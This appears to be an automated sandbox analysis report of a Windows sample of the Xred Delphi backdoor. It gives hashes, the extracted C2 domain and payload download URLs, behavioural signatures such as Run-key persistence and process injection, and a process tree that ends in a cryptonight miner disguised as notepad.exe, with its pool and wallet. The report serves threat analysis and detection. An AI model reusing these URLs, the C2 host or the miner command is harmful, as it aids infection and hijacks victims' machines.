Analysis

  • max time kernel
    140s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-12-2024 01:41

General

  • Target

    9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe

  • Size

    1.6MB

  • MD5

    12c15622b2ea89ac2d013e40f3c840c6

  • SHA1

    cec0c45eab3f56c9d428599c65b1b3b91e1a8c09

  • SHA256

    9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66

  • SHA512

    e494348a209a2a18baeab35d1a219651d4088cccad0f27bb04a484f8363bf2fb6f0db493859984b7d3095b0a0a1a06337bfb38fcec1213f8afee548d662b881c

  • SSDEEP

    24576:gnsJ39LyjbJkQFMhmC+6GD9mp2gARDzWUHcW5BKDoEnAuB3VcXsQiWfw:gnsHyjtk2MYC5GDzgAxz3HcWv2BmBw

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 8 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe
    "C:\Users\Admin\AppData\Local\Temp\9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2092
    • C:\Users\Admin\AppData\Local\Temp\._cache_9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2876
    • C:\ProgramData\Synaptics\Synaptics.exe
      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
          "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2084
          • C:\Windows\notepad.exe
            "C:\Windows\notepad.exe" -a cryptonight -o stratum+tcp://pool.minexmr.com:4444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQpR48NWyTtgLF8daDK.newminer -p x -t 8
            5⤵
              PID:1964
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:236

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\Synaptics\Synaptics.exe

      Filesize

      1.6MB

      MD5

      12c15622b2ea89ac2d013e40f3c840c6

      SHA1

      cec0c45eab3f56c9d428599c65b1b3b91e1a8c09

      SHA256

      9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66

      SHA512

      e494348a209a2a18baeab35d1a219651d4088cccad0f27bb04a484f8363bf2fb6f0db493859984b7d3095b0a0a1a06337bfb38fcec1213f8afee548d662b881c

    • C:\Users\Admin\AppData\Local\Temp\._cache_9da075ecd10a7fbc4c0686ea7e083f6261438947ce7a94c1f83683cdc0c09d66.exe

      Filesize

      924KB

      MD5

      e636189bce45b8bde5a59464b108cca4

      SHA1

      828201fd6561fd992d80d40fd7c1432552f32211

      SHA256

      86170ddd6b618ee94b8049da9486adff45f98979d62be8b4fd99f6fc6f0994f2

      SHA512

      96887f07d155616d0905cca11d900e1020a8b28e79e6ddf665223c2a91d6ae774d6343d62836e6ad532911baf4abee93b58cafb452d360a63b4304bc9d469720

    • C:\Users\Admin\AppData\Local\Temp\kEVUb2XX.xlsm

      Filesize

      17KB

      MD5

      e566fc53051035e1e6fd0ed1823de0f9

      SHA1

      00bc96c48b98676ecd67e81a6f1d7754e4156044

      SHA256

      8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

      SHA512

      a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

    • memory/236-44-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2084-81-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/2084-89-0x0000000000070000-0x0000000000118000-memory.dmp

      Filesize

      672KB

    • memory/2084-92-0x0000000000070000-0x0000000000118000-memory.dmp

      Filesize

      672KB

    • memory/2084-69-0x0000000000070000-0x0000000000118000-memory.dmp

      Filesize

      672KB

    • memory/2084-71-0x0000000000070000-0x0000000000118000-memory.dmp

      Filesize

      672KB

    • memory/2084-67-0x0000000000070000-0x0000000000118000-memory.dmp

      Filesize

      672KB

    • memory/2084-74-0x0000000000070000-0x0000000000118000-memory.dmp

      Filesize

      672KB

    • memory/2084-80-0x0000000000070000-0x0000000000118000-memory.dmp

      Filesize

      672KB

    • memory/2084-91-0x0000000000070000-0x0000000000118000-memory.dmp

      Filesize

      672KB

    • memory/2084-77-0x0000000000070000-0x0000000000118000-memory.dmp

      Filesize

      672KB

    • memory/2084-86-0x0000000000070000-0x0000000000118000-memory.dmp

      Filesize

      672KB

    • memory/2092-30-0x0000000000400000-0x00000000005A9000-memory.dmp

      Filesize

      1.7MB

    • memory/2092-0-0x00000000003C0000-0x00000000003C1000-memory.dmp

      Filesize

      4KB

    • memory/2772-64-0x0000000000400000-0x00000000005A9000-memory.dmp

      Filesize

      1.7MB

    • memory/2772-93-0x0000000000400000-0x00000000005A9000-memory.dmp

      Filesize

      1.7MB

    • memory/2772-127-0x0000000000400000-0x00000000005A9000-memory.dmp

      Filesize

      1.7MB

    • memory/2876-65-0x0000000000AC0000-0x0000000000B00000-memory.dmp

      Filesize

      256KB

    • memory/2876-22-0x0000000000AC0000-0x0000000000B00000-memory.dmp

      Filesize

      256KB